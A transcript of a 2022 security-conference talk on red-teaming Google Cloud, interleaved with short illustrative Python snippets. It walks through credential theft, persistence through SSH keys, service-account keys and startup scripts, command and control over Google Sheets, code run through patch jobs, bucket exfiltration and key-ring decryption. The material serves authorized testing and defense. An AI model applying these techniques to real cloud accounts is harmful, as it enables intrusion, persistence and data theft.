
So You Think You Can Secure Your Cloud: Red Team Engagements in GCP

BSidesSF 2022 · 50:41 · Published 2022-07
Speakers: Brad Richardson, Madhav Bhatt
Category: Technical · Team: Red · Style: Talk
About this talk
Brad Richardson • Madhav Bhatt - So You Think You Can Secure Your Cloud: Red Team Engagements in GCP. A detailed guide to adversary simulations in GCP: how to get an initial foothold, persist, escalate privileges, use Google's own products as C2, manipulate firewall rules and compute instances, and abuse Key Management Service and Google Cloud Storage to decrypt and exfiltrate data. Sched: https://bsidessf2022.sched.com/event/rjrR/so-you-think-you-can-secure-your-cloud-red-team-engagements-in-gcp
Transcript [en]

All right everyone, we're ready to start our next talk. Our next speaker is Brad Richardson, here to talk about red team engagements in GCP. Take it away.

Thank you. Good afternoon, BSides, thanks for joining me this week: red team engagements in GCP. We'll be talking about what it's like to do a red team engagement in GCP. A lot of it will come from taking our typical attacker objectives, the tactics that any red team finds itself walking through, and applying them to resources that are unique to GCP.

A lot of what you'll see is what I call living off the cloud. You've heard of living off the land; this is living off the cloud, so we'll be taking normal functionality and using it red team style. I want to point out that Madhav would have been here, but he had a personal conflict; we would have co-presented this together, and I know he was super bummed he couldn't be here today. He directly contributed a lot of the material you're going to see, and I'll also be talking about a tool we co-wrote together.

Even a lot of that is his evil genius, so I want to make sure he gets proper credit. Jumping in with a quick disclaimer: a lot of what we do, even though we're professional red teamers, is done in our spare time. These are our own views, developed over several years doing red team engagements, both with the government and in typical corporate environments. What you see doesn't necessarily reflect anything from our employer; it really comes out of a lot of our own personal research and tool development. With that out of the way, who am I? I'm Brad Richardson. I tweet at jb. I'm an offsec engineer, currently at Credit Karma. I like to blog about things I think are practical and useful to the security community over at Medium, and my most recent tool, at least the one I'm kind of proud of, is called Slackhound, a reconnaissance tool for red teams targeting Slack workspaces, so check that out. And I'll introduce Madhav: he tweets at desi jarvis, we work together, he's an offsec engineer at Credit Karma as well, blogs at Medium, writes tools himself, and he's a contributor to Atomic Red Team. I said we'd be walking through the typical tactics and phases that any

red team would go through, in this case unique to GCP, and that's exactly what we'll do. We'll orient ourselves a little bit to GCP, walk through an initial foothold, then go through persistence, privilege escalation, command and control, and lateral movement. We'll finish off with data, because we normally need to do all of these things to accomplish our objectives, and more often than not our objective is about data, so we'll talk about data decryption and exfiltration. A little bit of GCP 101: if you're into pictures, GCP looks like this, especially from an attack perspective. At the top level you have your organization node,

which might be your domain, say redteam.com. Below that you may have sub-orgs, and below that projects, and projects are really where your resources are going to live, where the magic happens. When I say resources, think of your compute, storage, secret management, network, those types of things. If pictures aren't your thing and lists are more your style, this is the same thing as a list: you have your organization at the top, your projects fall under that, and in larger enterprises you may encounter folders. I think of folders as a way of organizing your IAM permissions; maybe you think of

departments, and those fit neatly under folders. You don't have to have folders in GCP, but you definitely have to have projects, and under the projects, as I said, will be your resources. So we'll jump into initial foothold. I won't spend too much time on this; hopefully, if you're doing red team engagements, you're at a maturity level where you spend the majority of the engagement in other attack phases, so you get the most information across the board. If you're spending a lot of time in initial access, trying to do phishing, you're at that point trying to

prove that an attacker, or an advanced attacker, can get into the environment, and you may be losing time. Time is money, and so is data on how your defenders respond in the other parts of the kill chain. With that said, there's nothing wrong with working on getting an initial foothold; a lot of good data does come out of it, so I wouldn't want to leave you without some information in this attack phase. I mentioned phishing: if you're using this attack vector, definitely check out a write-up by Cedric Owens, where he talks about how to get a tool called Evilginx up

and running. Evilginx really makes phishing a lot easier, especially if your organization is using identity portals like Office 365 or Okta; it could be any of those SaaS-based identity portals. Evilginx makes this easy: you still do your typical phishing, but the man-in-the-middle attack takes a lot of the pain out of it. Instead of setting up a site and scraping a lot of CSS to make it look legitimate, the man-in-the-middle attack does what you want, which is capture those username and password credentials, potentially bypass MFA, and get you a valid session into that portal.

One thing to be on the lookout for, because it's GCP: red teams are always looking for credentials. If you're doing AWS, maybe it's an S3 bucket; if you've compromised endpoints during your operation, you're looking at traditional things, keys and different types of secrets, and you're looking for specific file extensions that might lead to something to help you move laterally from your initial foothold. For GCP, look for .json file extensions, and .p12 files as well. The difference, as I like to think of it, is that one is more Google-managed keys and the other is more customer-managed and uploaded. I also don't want to discount

traditional methods of getting initial footholds, so things like SSRF vulnerabilities still come into play; it doesn't matter that it's GCP. One other thing I'll point out on this slide, maybe you're aware, maybe you're not: it's been reported to Google that if you use programmatic access like gcloud and gsutil to do a lot of automation for GCP, the credentials are stored in clear text. That's what you'll find on a compromised endpoint, or it could even be your own machine, in the home directory under .config/gcloud. If you find credentials in there and there's an active session, all you need to do as the red teamer is download those files and you can take over that session, assuming

again that it's a valid session; those do time out, but if it hasn't, you can assume that session. This is not unique to GCP, and none of what I'm saying is ever intended to pick on GCP; AWS and Azure are a little bit different but still suffer the same kinds of issues. If you haven't heard of this particular technique, there's a write-up Madhav did about how to go about exfiltrating those credential databases. Of course, if you're getting a foothold on an endpoint, you at least have the privileges of the user that clicked on that phishing email, or whatever it was; it's not going to

require root or administrator privileges, so you'll be able to read those database credentials and download them, or should be able to. I know I have links here; I think they're going to make these slides available, and I've also linked to them so you can download the PDF. All the links are available, so you can go read these write-ups in your own spare time. Continuing on, we won't spend too much time here, but in case you're not familiar with what service account keys and credentials look like in GCP, and you find yourself in an engagement in this cloud environment, you see an example here. The things that

help orient you: we're using gcloud, and we see the project we're in. If you think about getting a foothold on an endpoint, you want to get situational awareness just like you would on a traditional on-prem network, so you run just a few commands, or look at that service account key, to see your project. Pretty much everything in GCP kind of looks like an email address; for service accounts you'll see something like @redteam-project-1.iam.gserviceaccount.com, so just be aware of that.
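To make the orientation step concrete, here is a minimal sketch of pulling the useful fields out of a found service account key file. The field names are the standard ones in a GCP service account JSON key; the sample values (project name, email) are made up for illustration.

```python
import json

# Fake service account key with the standard GCP field names; the
# project and email values are invented for this example.
SAMPLE_KEY = """
{
  "type": "service_account",
  "project_id": "redteam-project-1",
  "client_email": "svc-deploy@redteam-project-1.iam.gserviceaccount.com",
  "private_key": "-----BEGIN PRIVATE KEY-----\\nMIIE...\\n-----END PRIVATE KEY-----\\n"
}
"""

def orient(key_json: str) -> dict:
    """Pull the fields that tell you which project and identity you hold."""
    key = json.loads(key_json)
    return {
        "project": key.get("project_id"),
        "identity": key.get("client_email"),
        "is_service_account": key.get("type") == "service_account",
    }

info = orient(SAMPLE_KEY)
print(info["project"], info["identity"])
```

The same two fields (project and identity) are what `gcloud auth list` and `gcloud config list` would show you on a compromised host.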

So we'll jump into persistence. Two main takeaways here. On the left side: if you're gaining initial access via a user account or access token, these are short-lived accesses, so the red team needs to move fast if you find one with an active session. Whereas if your initial access comes from a service account, you're good: these are very long-lived sessions, and I'll show you a little later just how long by default. If you come across a service account (and that's why I point out those file extensions, and why it's important to keep an eye out for them when you're doing reconnaissance where you land on an endpoint), you may have just killed two birds with one stone, with the ability to have your persistence and

hopefully move laterally. Here's what you see: very tactical examples. At the top, we're working with SSH keys for persistence. You see the Google Cloud console, the web-based GUI, and in there you have the SSH public key for the test account; below, you see what it looks like from the CLI. I've catted just a fake public key, and what you see in the red box is it being successfully added using Google's own built-in SDK. In this case we're using gcloud compute instances add-metadata on the instance we want, and we can give it a local file, in this case the public SSH key portion,

and it works; tying back to the top, the key is added. One very important thing I want to point out: the format of the public key on your traditional Linux host is a little bit different from what Google expects. If you're using this method, take note: it's the account, a colon, ssh-rsa, a space, then the key material. If it's not in this format, Google may or may not throw an error, but when you go to log in or SSH in, it won't work and you may not know why, so I wanted to point that out in case you're using this method.
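That format gotcha is easy to sketch: GCP metadata wants `USERNAME:KEY_TYPE KEY_MATERIAL`, whereas a key copied straight out of `~/.ssh/id_rsa.pub` starts with `ssh-rsa`. A small helper (names and key material here are made up) makes the difference explicit:

```python
def gcp_ssh_key_entry(username: str, public_key: str) -> str:
    """
    GCP expects SSH keys in instance/project metadata as
    'USERNAME:KEY_TYPE KEY_MATERIAL', e.g. 'testuser:ssh-rsa AAAAB3... comment'.
    A key pasted straight from id_rsa.pub is missing the leading 'USERNAME:'
    and may be accepted without an error yet never grant access.
    """
    public_key = public_key.strip()
    if public_key.startswith(f"{username}:"):
        return public_key  # already in GCP format
    return f"{username}:{public_key}"

entry = gcp_ssh_key_entry("testuser", "ssh-rsa AAAAB3NzaC1yc2E testuser")
print(entry)  # testuser:ssh-rsa AAAAB3NzaC1yc2E testuser
```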

Going back to service accounts: here you see the Google Cloud console. One thing to note is that in GCP a service account can have multiple keys. If you come across a service account and you see a key, you obviously don't have that key, but it doesn't mean that, with the right permissions, you can't add additional keys; you can. I also said that service account keys are long-lived: by default they're good until December 31st, 9999. I call that long-lived. To me, one of the most fun things about red teaming is when I can find normal built-in functionality and turn it to the advantage of the red team, and in GCP

you have startup scripts that you can attach to compute instances, and it will execute them. They can be very complicated, and you can also find keys and tokens in startup scripts, just normal admins working to make things do what they want. But we can use this functionality too. What you're seeing is a very simple example, but it doesn't really matter, it will work: I create my example shell script, chmod it to be executable, and again use the Google-provided SDK, the gcloud command. I give it the instance I want, and with that script stored locally I can run it,

and it will attach the startup script, and whenever this host reboots, it will execute my code. You can see in the Cloud console where it's been added, and below you see root on instance-3: grab the hostname, then I check that the file was successfully created and cat it. It's in /etc, you see beacon.sh, and I just echoed a command for the example; you see the text there, "my beacon runs on bacon", so our startup script worked. Of course, in a real red team engagement you're going to put something besides that.
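The gcloud invocation for attaching a startup script can be sketched like this; building the argv as a list makes it easy to review before running. The instance name, zone, and script path are placeholders, and this is an illustrative sketch of the command shape, not run against a real project.

```python
import shlex

def add_startup_script_cmd(instance: str, zone: str, script_path: str) -> list:
    """Build (not execute) a gcloud command that attaches a local file as
    the instance's startup script, which runs as root on every boot."""
    return [
        "gcloud", "compute", "instances", "add-metadata", instance,
        "--zone", zone,
        "--metadata-from-file", f"startup-script={script_path}",
    ]

cmd = add_startup_script_cmd("instance-3", "us-central1-a", "./beacon.sh")
print(shlex.join(cmd))
```

Printing the joined command first is a cheap habit on engagements: you get the exact line for the red team log before anything touches the target.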

Sometimes, depending on how the enterprise has architected things, maybe you don't have CLI access, or maybe you're just more comfortable working in a GUI-based interface. No problem: once you have this persistence, you can log in through whatever method, and thankfully GCP supports SSH login through the browser as well. On establishing persistence on a project: you can add even Gmail accounts to a project. Once you have enough IAM permission and want to add an account, it doesn't necessarily have to be an email address in your organization. When I've tried this, it will complain if the address is

outside the organization's domain, or Gmail, but Gmail works, even though you'd think a redteam.com organization would need a redteam.com address. I assume there's functionality to disable this, but by default it works just fine, and GCP will send an email to the address you specify; that's what you see on the right side: "I invite you to join the Google Developers Console" (the project is redacted there), and once you accept the invite, whatever role you were granted, you're good to go. Continuing with persistence on a project: I mentioned earlier to be on the lookout for JSON keys. Once you have the right permissions, you

go to create a service account, and it asks you to download and save that JSON file, which is the service account key. Whenever I see an application warning me that service account keys could pose a security risk if compromised, that's very interesting to me as a red teamer. So here again we're just downloading the key, and now we have that persistent access.

And again, you see we're doing persistence, and we can add even a Gmail address, in this case at the organization level, even escalating our privileges a bit: the role we're setting is Owner. However, a bit of this sounds kind of simple, right? We've all seen test labs; test labs are very small and everything is very default. A large company may have thousands of projects, may have things broken out into folders, using lots of different resources. Of course you need the appropriate permissions; that doesn't change in the cloud from how it is on-prem. You still need

that level of access to do these things, so finding the right accounts and the right compute instances is just as much of a challenge as it is on on-prem networks. What do we do about that? We'll talk about privilege escalation, but I also want to bring up a tool that Madhav and I have written together. It automates a lot of what you've seen in this presentation, and a lot of what's still to come. If you're in an environment with hundreds, thousands, tens of thousands of projects, and lots of accounts and different roles, it can be too overwhelming when

maybe your red team is five people, ten people, or smaller; you could potentially burn all your time trying to figure out who has the power in the kingdom. GCPHound really helps with this. I have a link there that takes you to a Medium article Madhav wrote; it tells you how to download GCPHound and get it up and running. It runs in a Docker container, very lightweight, and currently it helps abuse IAM, Compute, projects, GCS, and KMS, a lot of the things I'm talking about, and I'll show you examples of it as well. It queries IAM, and it also has a GUI for the IAM portion; I

think we will eventually bring all of the modules and functionality under the GUI, but we started with IAM just because of the problem of decoupling when you're talking about so much data. That's what you see here; it might be a little blurry on screen, but it makes it much clearer when you're trying to find out who has the roles you're going after. It's fast and stealthy: it's multi-threaded, and it uses random sleep times to potentially throw off rate limiting or the blue team. It's also customizable: by default it populates this file with

the typical juicy accounts you'll probably be going after, but you can change that. If there's a particular role in your organization, maybe custom, maybe unique, that you want to add, add it in that text file, no problem, and it will pull all that data in and show it in a nice GUI to help you out. On escalation and persistence: remember we talked about service account persistence. You can certainly run the gcloud commands, but some of those get pretty lengthy, quite a bit to type at times. GCPHound helps shorten that; it also helps automate what we're really trying to do, which is save time. What

you see here is GCPHound's create-service-account-key function: you give it the project, the service account you want created, and a couple of other things GCP expects. What it does is check that your session is still valid, that you're still logged in; it creates some local directories for you, and it attempts to create that service account. If the service account already exists (you might recall we can have multiple service account keys), it goes ahead, downloads a key, and stores it for you so you have it to use: a little bit of automation. And of course, if we can become

Owner, let's become Owner: GCPHound, as it does the first part of that, will also, assuming it has the right permissions, attempt to put you in the Owner role for that service account. What you see here is a bit redacted, but the green box shows it was successful, and up here you see it validated in the Cloud console: the service account we created as Owner, with a nice 5578 out of 5578 access permissions. So we'll jump into a little bit of command and control: not every engagement requires that you establish C2, but it's always nice to have.

So if you're doing a red team engagement in GCP, and let's say you're working in a really restrictive environment, I'll leave you with two potential options. The first is to use Google Sheets. I wrote a Medium post, and I also put out on my personal GitHub some Python code that helps you establish C2 using a Google Sheet. What I like about this is that it's a little harder for Google to block Google: GCP talking back to a Google doc. By default it runs over HTTPS, so our channel is encrypted; we didn't have to do anything special for that. If you go this route, it really only requires a couple of things

to get up and running; the nice thing about SaaS is that it helps us out here. You need Python, you need a GCP service account (it doesn't need to be privileged, and I don't think it even needs to be in the project you're targeting, you just need a GCP service account), and of course you need a Google Sheet, and you'll need to enable the Google Sheets API to get this working. Other than that, you don't really need anything else. If you check out the Python code I put on GitHub, it's not going to be as full-featured as something like Mythic or Cobalt Strike, but that doesn't

mean you can't do your initial reconnaissance and establish situational awareness, and I built in a command so that it will download whatever you point it to. It doesn't use curl; it's done with Python internals, so it's a little stealthier than running something on the command line to download, say, a payload you want to use to upgrade your C2 from this to something more full-featured. There's also dnscat2; I didn't write that, but I did put the author up there. It works really well if you find yourself in a super restricted environment where ACLs are really locked down and you can't make it out to the

internet; it doesn't seem like you can make it out on any TCP or UDP port from the project because it's that restricted. Well, with normal DNS functionality, Google will help you out by forwarding client queries outbound to the internet, so that may be an option for you. I did say that you need to enable the Google Sheets API and create a service account; these are really simple to do in GCP. Here's an example of what it looks like with my Python-based C2 over Google Sheets. What you see in the top portion is just running the Python client; it's calling out to

that Google Sheet. If you're familiar with Google Sheets, you share a sheet with a person via what normally looks like an email address, right? Remember we talked about how service accounts look like email addresses: we just take our service account ID and share the sheet with it. In our sheet here I've added a couple of columns to make it more manageable; you see C2 command, command output, and timestamp. The client reads from that cell, very simply grabs the whoami and executes it; up here we see that it's root. It automatically goes to the next row, so it cats /etc/os-release and we get our situational awareness:

we see the operating system we're working from, and we can do curl --version and see that there. It timestamps each command it runs, which is always helpful for the red team, because we're trying to manage the red team log and be able to go back later and say what the host was and when we executed, so this helps with that too.
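The row format of that Sheets-based C2 (command, output, timestamp) is easy to sketch locally. In this toy version the "sheet" is just a Python list; the real tool would read and write cells through the Sheets API instead, and the example command is just an echo.

```python
from datetime import datetime, timezone
import subprocess

# Stand-in for the Google Sheet: each appended row is
# (command, command output, UTC timestamp), matching the talk's columns.
rows = []

def run_and_log(command: str) -> tuple:
    """Execute a shell command and log it the way the sheet rows do;
    the timestamp is what lets you reconcile the red team log later."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    row = (command, result.stdout.strip(),
           datetime.now(timezone.utc).isoformat())
    rows.append(row)
    return row

cmd, out, ts = run_and_log("echo my beacon runs on bacon")
print(out)  # my beacon runs on bacon
```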

We'll dive into lateral movement. By default, every compute instance in GCP has a compute default service account attached to it. This can be customized, this can be changed, but just talking defaults, in large environments especially, you might find variations of this. By default, that account has the Editor role; however, this does not mean you can use all of those permissions. If the account has an active token in the session you're trying to abuse, we can run a few simple gcloud commands and orient ourselves to the host we're on: gcloud auth list, and projects get-iam-policy. What you see in the screenshots is those being run; the red box at the top tells us that the host we've landed on is using that compute default service

account. Then you can curl the metadata server from the compute instance, just like you see here, and that will come back with your access scopes. So two things determine what APIs you can query in GCP from, say, a compute instance, and IAM permissions are only half the battle. What you see here is actually pretty restricted: the access scopes determine what we can do with those other cloud resource APIs, and by default it's pretty locked down; you have some read-only permissions for storage, plus monitoring and trace append.
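The scopes endpoint returns one scope URL per line, so triage is a one-liner. On a real instance you would GET `http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes` with the header `Metadata-Flavor: Google`; here the response is a canned copy of the default scope set so the parsing logic stands alone.

```python
# Canned stand-in for the metadata server's scopes response
# (these are the default Compute Engine access scopes).
DEFAULT_SCOPES = """\
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
https://www.googleapis.com/auth/trace.append
"""

def triage_scopes(raw: str) -> str:
    """Classify a scopes response: cloud-platform means the token can hit
    any API the IAM role allows; otherwise scopes cap what Editor can do."""
    scopes = [s.strip() for s in raw.splitlines() if s.strip()]
    if any(s.endswith("cloud-platform") for s in scopes):
        return "broad"      # Editor role + cloud-platform scope: jackpot
    return "restricted"     # default scopes: read-only storage, logging, etc.

print(triage_scopes(DEFAULT_SCOPES))  # restricted
```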

But if you land on a compute instance that has that Editor role, and you query and find that you have access scopes like, for example, cloud-platform, or a whole lot of additional permissions, life just got a lot better: you have a lot more access. I wouldn't want to leave Windows out; GCP obviously supports Windows, and not everyone is in a Linux environment. Here we're targeting a Windows host: let's say in our red team engagement, all of the data we're after, whatever the objective is, is on a Windows host. We can use gcloud compute reset-windows-password, giving it the instance name, the zone, and the user account. Now, if that account does not exist and we have

the right IAM permissions, this is all we need to create it: GCP will do this very easily for us, and it will also drop it into the local Windows Administrators group. It returns us the password that you see here, and we're good to go. If we're targeting an account that does exist (we know it exists from reconnaissance or some other means), we do the same thing: it changes the password, gives us the password, and we're good to go. Again, I love it when we can take normal GCP functionality and use it for red team purposes. GCP includes the ability to patch our GCP instances at scale: you can

set up patch jobs so that if you want to target one Linux compute instance, you can; if you want to target all Linux compute instances, you can; whatever subset, and if you're really gutsy and not worried about triggering alarms, you can tell it everything in the project. In this case, what you see is us using GCPHound to make it a little easier. We give it an instance, and just like with normal GCP functionality, we can specify a local file or a file in a Google Cloud Storage bucket. We run our patch job, and we'll patch the compute instance just like an admin would, except we'll

also run our code: we can use a script and apply it to the compute instance. The only thing about it is that, like with normal patching, it will probably reboot the compute instance, but it's fairly stealthy. Sometimes your admins will be like, why did the host reboot? Oh well, looks like there was a cron job or something happened; we see that what it did was just patching, so that's why it rebooted, we'll make a note of it. So even though it rebooted, you might get through as a red team. What you see down here in the Cloud console is that the

patch job was successful: it patched the host from my patch job, "patchy real good", and it would have executed our code as well, a pretty stealthy method. One thing I'll point out: if you use this method and you supply a GCS location, meaning the script you want to run on the host lives in a bucket, you need to turn on versioning. This was not very clear to me at first, and I kept wondering why the patch job was failing: if you call a script in GCS, versioning needs to be turned on, or it won't work. Back to lateral movement

using SSH keys: here we're using gcloud again, and we can modify the metadata for the project; of course we can do that for the compute instance as well, as we saw. If you use gcloud or GCPHound to add your SSH public key to a compute instance, you see it in the metadata for that compute instance in the Cloud console; in this case we're looking at the project. What makes this particularly cool is that if we add it to a compute instance, we can SSH into that compute instance, but if we add it to the project, then we can SSH into every compute

instance in that project. Now, I'll point out that there's a way to defend against this: you can set a compute instance to block project-wide SSH keys, but generally you're probably not going to find that to be the case. One other thing: if you add your SSH key to the project metadata, then not only do you have SSH access into your already-running instances, but when an admin goes in tomorrow or the next day and builds more compute instances, you'll have access to those as well.
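Project-wide `ssh-keys` metadata is a single newline-separated value, so when you edit it by hand you want to append your entry without clobbering the admins' existing keys. A small sketch (the usernames and key material are invented):

```python
def merge_ssh_keys(existing: str, new_entry: str) -> str:
    """Append a new 'user:ssh-rsa ...' entry to a project's ssh-keys
    metadata value, preserving existing entries and avoiding duplicates."""
    entries = [e for e in existing.splitlines() if e.strip()]
    if new_entry not in entries:
        entries.append(new_entry)
    return "\n".join(entries)

current = "admin:ssh-rsa AAAA111 admin"
merged = merge_ssh_keys(current, "testuser:ssh-rsa AAAA222 testuser")
print(merged.count("\n") + 1)  # 2 entries
```

Overwriting instead of merging is both noisy and destructive: admins lose access and notice immediately, which defeats the stealth value of the technique.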

so you may not and so you see if you just go build a standard project this is what your firewall firewall rules will look like so you see ingress rules here icmp all tcp ports all udp ports and default rules for 33 89 and 22 for ssh doesn't mean that admins can't restrict this tighten these rules up use least privilege of course they can of course they should we're there to help the defenders defend better but just to show you what it would look like by default and gcloud compute ssh this is a particularly nice feature in gcp so you think about normally ssh into typical linux box well you can use gcloud compute ssh and you see up there

in the red box we give it the instance name we give it the zone assuming we have the right iam permissions it will ask us for the pass rate of print passphrase of our key assuming we've set a passphrase for our key and we're in we don't have to have an external ip address this is a difference between your traditional on-prem networks versus the cloud in this case you know on-prem network we might need to set up some netting rule firewall rule to route from external to internal google gcp takes care of this for us assuming we have the right permissions the instance i used in this example did not have an external ip address or

ephemeral ip address only an internal but i have the right id and permissions to actually use this gcloud command and i'm able to sshn one other thing that i'll point out here is you see the red box around the 35 235 340 ip address well that's on my home ip address or external ip that's google's ip address so i get a little extra stealth out of this i didn't have to do anything for it if someone's looking at who logged in and from where well looks like i logged in from google and last section we'll talk about data exfiltration and decryption the other sections you know those are things that red teams have to do those

The other sections are the tactics that we typically walk through to eventually be able to action on objectives. More times than not, the real objective has something to do with data, right? So we're trying to test the assumption that a determined attacker could get to wherever the data is kept: could they read the data, could they modify the data, could they exfil the data? A lot of times, it's all about the data.

So here you see we're using GCPHound, with a couple of different functions that Madhav added to make this simpler, less to type: bucket list and exfil bucket. Again, you're working in a big environment; there could be hundreds or thousands of buckets, and lots of objects in those buckets. A lot of times, red teams are drinking from a fire hose; there's just so much to go through. Red teams aren't exactly like a nation state, where you might picture an operation filling an airplane hangar; usually red teams in corporate environments are pretty small, and it's tough, right? So GCPHound gets through that data a lot more quickly. You see where we think we've come across a project that looks interesting, so we can use bucket list. GCPHound will check that our session is still valid, make sure we're still logged in, then pull a list and start querying everything in GCS for that project. What you see here, in the test environment I've created, is it pulling all of the available buckets and downloading them to my local machine. So there's your listing and there's your exfilling, all made simple.
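Under the hood, that list-then-pull workflow is just bucket enumeration plus object downloads. A rough, self-contained sketch of the loop (the client class and all names here are stand-ins I made up for illustration, not GCPHound's actual code or the real google-cloud-storage API):

```python
import os

# Stand-in for a real GCS client (e.g. google-cloud-storage), so the
# enumeration/exfil loop below is runnable without credentials.
class FakeStorageClient:
    def __init__(self, data):
        self._data = data  # {bucket_name: {object_name: bytes}}

    def list_buckets(self, project):
        return list(self._data)

    def list_objects(self, bucket):
        return list(self._data[bucket])

    def download(self, bucket, obj):
        return self._data[bucket][obj]

def exfil_project(client, project, out_dir):
    """List every bucket in `project`, then pull every object to disk."""
    pulled = []
    for bucket in client.list_buckets(project):
        for obj in client.list_objects(bucket):
            path = os.path.join(out_dir, bucket, obj)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(client.download(bucket, obj))
            pulled.append(path)
    return pulled

client = FakeStorageClient({"prod-backups": {"dump.sql": b"-- data --"}})
print(exfil_project(client, "demo-project", "loot"))
```

The value of a tool here is not the loop itself but the plumbing around it: session checks, paging through large listings, and retrying, which is what makes "hundreds or thousands of buckets" tractable for a small team.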

Of course, the data may be encrypted; we need to decrypt it, otherwise it's useless. In Google, you have KMS, which typically helps you encrypt the data, and gcloud of course has commands to both encrypt and decrypt data, to store your keys, to create your key rings. What you see up here, although a lot of it is redacted: we can do traditional things, like cat the data and see that it's encrypted, and we can type out these very long gcloud KMS commands, and they work; once we find the right key from the right key ring, we can decrypt the data. But if you're in a very large environment, that would take a lot of time. With GCPHound's decrypt function, we just need to give it the project ID, the key ring, the region, and the file that we want, so it doesn't matter how big the environment is. It again checks that the session is valid and that we're logged in, and then, based on those few parameters, it goes out to the key ring we gave it. You see, with the green box around it, that it's trying the keys from that key ring; it will try every key until it finds the right one for the data you want decrypted. Once it does, you see "decryption successful," and it stores the output locally for us. I just put a "b" in that file, but it basically shows that the file was successfully decrypted.
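That try-every-key-on-the-ring behavior is easy to model in code. A toy sketch (the `WrongKey` error, the `kms_decrypt` stand-in, and the key names are all hypothetical; a real implementation would call `gcloud kms decrypt` or the Cloud KMS API, which simply errors out on the wrong key):

```python
class WrongKey(Exception):
    """Raised by our stand-in when a blob wasn't encrypted under this key."""

def kms_decrypt(key_name, blob):
    # Stand-in for a real KMS decrypt call. The toy "ciphertext" is a
    # (key_used, plaintext) pair; real KMS would fail on a key mismatch.
    key_used, plaintext = blob
    if key_used != key_name:
        raise WrongKey(key_name)
    return plaintext

def decrypt_with_any_key(keyring, blob):
    """Try every key on the ring until one decrypts the blob."""
    for key in keyring:
        try:
            plaintext = kms_decrypt(key, blob)
            print(f"decryption successful with key: {key}")
            return plaintext
        except WrongKey:
            continue
    raise RuntimeError("no key on this ring decrypted the blob")

keyring = ["key-a", "key-b", "key-c"]
blob = ("key-b", b"b")  # "encrypted" under key-b, like the demo file
print(decrypt_with_any_key(keyring, blob))
```

The point of the sketch is the iteration pattern: with list permission on the key ring plus decrypt permission, an attacker never needs to know which key protects which file.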

So, just some closing remarks. We went through things that I think are practical, things that red teams can do to live off the cloud: take the resources that are there and use them from a red team's perspective. We talked a lot around Compute, a little around KMS and encryption, and GCS. There's a lot more that we didn't cover; this was just a subset. GCP is really powerful, with a lot of resources and functions: think about Cloud Functions, Secret Manager, firewall policies. We really just scratched the surface, but hopefully those examples were practical and down to earth. If you're starting a red team engagement in GCP, maybe you haven't done one before, or maybe you have and you just wanted to see what approach another red team might take, hopefully that's been helpful and gets you thinking about cloud security.

I talked about gcloud compute ssh and how you didn't have to have an external IP address; in some cases it will create an IAP tunnel for you and allow you to SSH in. We have to think about the security issues we had in traditional on-prem networks and how they might be the same in the cloud, or a little bit different. Our job as a red team is to validate assumptions. Don't just assume that the security controls we're helping to build and mature actually work. Not to pick on security vendors, but of course they always work according to the security vendors; we have to test them. We can't take it for granted, because we want to make those security controls stronger, and validation is part of that. So be careful: cloud infrastructure may not be any more secure than the on-prem version you had before, and the cloud provider may or may not provide the basic security controls. IP allowlisting, for example: very basic, been around a long time. Don't assume that it's just taken care of for you, or that it can even be done in some cases. It's 2022, and a lot of these things seem like stuff that we as a security industry should have fixed a long time ago, but not necessarily. You assume that any car you buy in 2022 comes with airbags; we can't assume that just because it's 2022 and we're in the cloud, things are naturally more secure by default. You heard me talk about a lot of configurations, the way things are set up by default, and how they can be abused. Don't take anything for granted.

With that, I appreciate everyone coming out, listening to the talk, and allowing me to share some information; hopefully you found it helpful. Big thanks to BSidesSF for allowing me to share as well. If we have any time left, I'm happy to take questions, or if you'd like to chat afterwards, happy to do that too. [Applause]

Yeah, I saw one of the first vectors was creating a new service account. Are there any artifacts, like email artifacts, that happen when those are created?

Yeah, so the question is: when you're using or creating service accounts, potentially for persistence, are there any artifacts left around, such as an email? You saw on one of the screenshots where you get the email, in one case, to accept that invite. From what I've seen, it's actually an option: you can tell it not to generate that email if you're trying to be particularly stealthy, or you can generate it. Is it an artifact? In that case, I would say it is, especially where, let's say, you've compromised an employee account, you have access to their email, and you generate that artifact. Now, an attacker could set up a rule so that the email goes into the trash very quickly, but that's still an artifact, right? Absolutely, and you could potentially alert on that. Cool, thank you. Yep.

Thanks so much. I have a question about the OS patch management; I'm not that familiar with that feature. I'm just wondering: is it possible for the admin to configure it to check the integrity, or the authenticity, of that patch to avoid the attack that you just explained?

So the question is: could an admin potentially check the integrity of the patch? I believe that is the case; however, in my mind it becomes detection versus prevention. When we create a script that we're going to attach to the compute instance and run after the patch job completes, as far as I know you would not be able, with the default built-in functionality, to detect or check the integrity of the script that you're running without creating something custom. In the example that you saw, I did not tamper with any of the actual RPMs in the patch job that were pulled down; I just created my own pre- and post-patch script to run. As an attacker, probably what I would do next is go and see if I could remove that patch job. Of course, as red teamers, I don't really like to remove the artifacts; I want to leave them there for the blue team to potentially investigate and hopefully find. So, best I can answer your question: I don't think it would be an integrity issue unless you built something custom. I could be wrong, but that's what I think.

How about the authenticity? Is it possible to configure, for example, that a patch needs a signature, and check the signature to make sure it comes from the legitimate origin?

If you're wanting to check the integrity of, for example, the RPMs that will be pulled down and installed: yes, you can check the integrity of your RPMs. With typical patching you would want to do that anyway, or I would want to do that, so that no RPMs get installed that didn't come from validated, verified RPM repos. Yeah, thank you.
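As the answer suggests, package authenticity is usually enforced in the repo configuration rather than in the patch job itself. On a RHEL-style system, the relevant yum/dnf knobs look roughly like this (the repo name and URLs are placeholders):

```ini
[example-repo]
name=Example repo (placeholder)
baseurl=https://repo.example.com/el8/x86_64/
enabled=1
gpgcheck=1        ; verify each RPM's GPG signature before install
repo_gpgcheck=1   ; also verify the signature on the repo metadata
gpgkey=https://repo.example.com/RPM-GPG-KEY-example
```

A single package can also be checked by hand with `rpm -K package.rpm`. Note that this covers the RPMs themselves, not the pre/post-patch scripts discussed above, which is exactly the gap the answer points at.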